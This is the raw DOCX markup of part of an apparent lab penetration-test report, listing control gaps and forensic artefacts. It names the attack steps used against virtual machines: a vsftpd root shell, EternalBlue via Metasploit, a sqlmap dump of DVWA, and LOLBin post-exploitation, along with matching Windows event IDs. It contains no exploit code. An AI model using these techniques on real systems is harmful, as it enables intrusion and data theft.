                    <w:t>No automated patching; SMBv1 not disabled</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00C934DB" w14:paraId="268DE9B8"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629269EB" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>SQL Injection</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5F64D84" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>No WAF, no input validation</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75087F11" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>No Web Application Firewall to block injection strings</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1FF9F44" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Insecure coding practices; no parameterised queries</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00C934DB" w14:paraId="07419784"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D4BEE8B" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:lastRenderedPageBreak/>
                    <w:t>Post-Exploitation (</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>LOLBin</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>)</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50B14E6" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>No EDR/behavioural monitoring</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52DA38F" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Native Windows tools (</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>whoami</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t xml:space="preserve">, net, </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>dir</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>) not flagged as suspicious</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2E85CEB" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t xml:space="preserve">No endpoint detection; </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>LOLBins</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> inherently trusted</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00C934DB" w14:paraId="41DA4428"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7A5E44E4" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Data Exfiltration</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D85E9E6" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>No DLP controls</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656AD4D3" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Database contents extracted without triggering any alert</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E738C4D" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>No Data Loss Prevention tooling or egress monitoring</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="6D7598BB" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="39052680" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="15A2C2C9" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="20175B09" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="3B0C1CB8" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB69E60" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="2AE6B96B" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="706410F7" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="49EBBE6E" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="73F54E9C" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRPr="004142FE" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D0506">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7.</w:t>
      </w:r>
      <w:r w:rsidRPr="004142FE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Forensic Artefacts &amp; Evidence </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D5AFE8" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="8564" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8564"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C934DB" w14:paraId="59E2AC2A" w14:textId="77777777" w:rsidTr="00D617DD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8564" w:type="dxa"/>
          </w:tcPr>
          <w:tbl>
            <w:tblPr>
              <w:tblW w:w="81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835"/>
              <w:gridCol w:w="2078"/>
              <w:gridCol w:w="3169"/>
              <w:gridCol w:w="1105"/>
            </w:tblGrid>
            <w:tr w:rsidR="00C934DB" w14:paraId="55DE22D1" w14:textId="77777777" w:rsidTr="00D617DD">
              <w:trPr>
                <w:trHeight w:val="356"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="1835" w:type="dxa"/>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34CA2D3A" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Artefact</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2078" w:type="dxa"/>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4B35CAA8" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Location</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3169" w:type="dxa"/>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69AC7EE6" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Description</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="1105" w:type="dxa"/>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198D1EAA" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Phase</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00C934DB" w14:paraId="13F23018" w14:textId="77777777" w:rsidTr="00D617DD">
              <w:trPr>
                <w:trHeight w:val="356"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="1835"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5EA9B92" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Nmap scan output</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="20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45EFC3D" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Kali: ~/initial_scan.*</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3169"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5AFFA5F2" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>XML/</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>grepable</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> scan results of all targets</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="11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C8E2370" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Recon</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00C934DB" w14:paraId="0A5373BA" w14:textId="77777777" w:rsidTr="00D617DD">
              <w:trPr>
                <w:trHeight w:val="576"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="1835"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D2BC93B" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Metasploit session logs</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="20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3D3C556" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Kali: ~/.msf4/logs/</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3169"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0E46331C" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Meterpreter session activity and commands</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="11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6237BDC" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Exploitation</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00C934DB" w14:paraId="1141E3D1" w14:textId="77777777" w:rsidTr="00D617DD">
              <w:trPr>
                <w:trHeight w:val="576"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="1835"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3E8B6104" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>vsftpd</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> shell transcript</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="20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415A402" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Kali: terminal capture</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3169"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D419420" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Root shell session on 192.168.56.101</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="11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7DC80B1" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Exploit A</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00C934DB" w14:paraId="0FFDB4C0" w14:textId="77777777" w:rsidTr="00D617DD">
              <w:trPr>
                <w:trHeight w:val="576"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="1835"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7CD706A" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>EternalBlue</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> session log</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="20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F5E61C9" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Kali: Meterpreter session 2</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3169"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32DA163D" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>SYSTEM shell transcript on 192.168.56.103</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="11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394012B" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Exploit B</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00C934DB" w14:paraId="513F4645" w14:textId="77777777" w:rsidTr="00D617DD">
              <w:trPr>
                <w:trHeight w:val="576"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="1835"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30BF368" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>SQLmap</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> output</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="20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C85A576" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t xml:space="preserve">Kali: </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>sqlmap</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>/output/</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3169"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3E29810D" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Full database dump from DVWA application</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="11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94899C0" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Exploit C</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00C934DB" w14:paraId="536636B7" w14:textId="77777777" w:rsidTr="00D617DD">
              <w:trPr>
                <w:trHeight w:val="576"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="1835"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0377B803" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Packet capture (</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>pcap</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>)</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="20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2DAF0A2" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t xml:space="preserve">Kali: </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>tcpdump</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> capture</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3169"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44E2A67" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Network traffic during all exploit phases</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="11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5BD8A10" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>All phases</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00C934DB" w14:paraId="7C793F37" w14:textId="77777777" w:rsidTr="00D617DD">
              <w:trPr>
                <w:trHeight w:val="576"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="1835"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34DFF72" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>VirtualBox snapshots</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2078"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24D80A5" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>VirtualBox Manager</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3169" w:type="dxa"/>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624D17AD" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Pre-exploitation state snapshots for all VMs</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="1105"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2922A9A" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Safety</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="527B290D" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="67F3BC4B" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="0C8B7ED0" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>7.2 Windows Event Log Artefacts (VM-3: Windows 7)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8CA4D0" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>•</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Event ID 4624 - Logon: SYSTEM account logon recorded following </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>EternalBlue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="549BA2B1" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>•</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Event ID 7045 - Service Installation: Metasploit SYSTEM service recorded in System log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BD460D" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>•</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Event ID 4688 - Process Creation: cmd.exe spawned by SYSTEM account (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
